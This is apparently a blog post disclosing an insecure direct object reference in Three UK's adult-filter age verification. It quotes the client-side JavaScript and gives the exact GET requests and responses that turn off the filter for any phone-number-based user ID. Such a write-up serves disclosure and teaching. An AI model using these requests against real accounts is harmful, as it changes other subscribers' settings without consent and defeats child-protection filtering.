In case you don’t know what Three is, it’s a carrier (my carrier) in the UK. Here, since 15 July 2019, the Digital Economy Act 2017 requires verification of age for access to adult websites. What does this involve? Entering your credit card information.

Just out of interest, I inspected it for horrible logic flaws. I wasn’t surprised. Firstly, all of the verification code was implemented client side.

var AdultVerification = function(msisdn, banId, isPaymentIntiated) {
  // snip
  this.toggleStatus = function(msisdn,status, callBack) {
    var ageVerifyInst = this;
    my3AdultVerificationDefaults.ajaxifyGET(toggleStatusRESTUrl+'?msisdn='+msisdn+'&status='+status, false, callBack, function(errText) {
      ageVerifyInst.showAdultVerificationSystemErrorContainer(errText);
    });
    return this;
  };
  // snip
};

The code involved in setting the verification status.

So, a user could just call adultVerification.toggleStatus to reset the flag. But that’s not all. You’re probably wondering what msisdn is. Well, this is the user’s ID. This is derived from the phone number. if the phone number is +44 1234567890, then the ID would be 441234567890. You can just change this to any number.

That’s right. An IDOR (Insecure Direct Object Reference) vulnerability. The system never actually checks if the ID corresponds with the user. In fact, the only check performed is if you are connected to the network.

The actual requests (all GET) sent are:

https://smobile.three.co.uk/SceRestService/SSOUserRestService/rest/userDetails/hasActiveAdultFilter?msisdn=441234567890
--> {statusMessage: "hasActiveAdultFilterJson for user 441234567890 Filter status true", status: 0, statusCode: 1}
https://smobile.three.co.uk/SceRestService/SSOUserRestService/rest/userDetails/toggleAdultFilter?msisdn=441234567890&status=0
--> {statusMessage: "Toggle Adult Filter Success for User 441234567890", status: 0, statusCode: 0}
https://smobile.three.co.uk/SceRestService/SSOUserRestService/rest/userDetails/hasActiveAdultFilter?msisdn=441234567890
--> {statusMessage: "hasActiveAdultFilterJson for user 441234567890 Filter status false", status: 0, statusCode: 0}

Because they are GET requests (bad web development practice BTW) you could just type them into a web browser and it would reset the flag.

What does this mean for Digital Economy 2017 and the BBFC? I think that it shouldn’t matter. Most kids would be unable to connect to the phone via USB (no, hotspot doesn’t work) and to run commands in the JS console. But either way this is an interesting bug.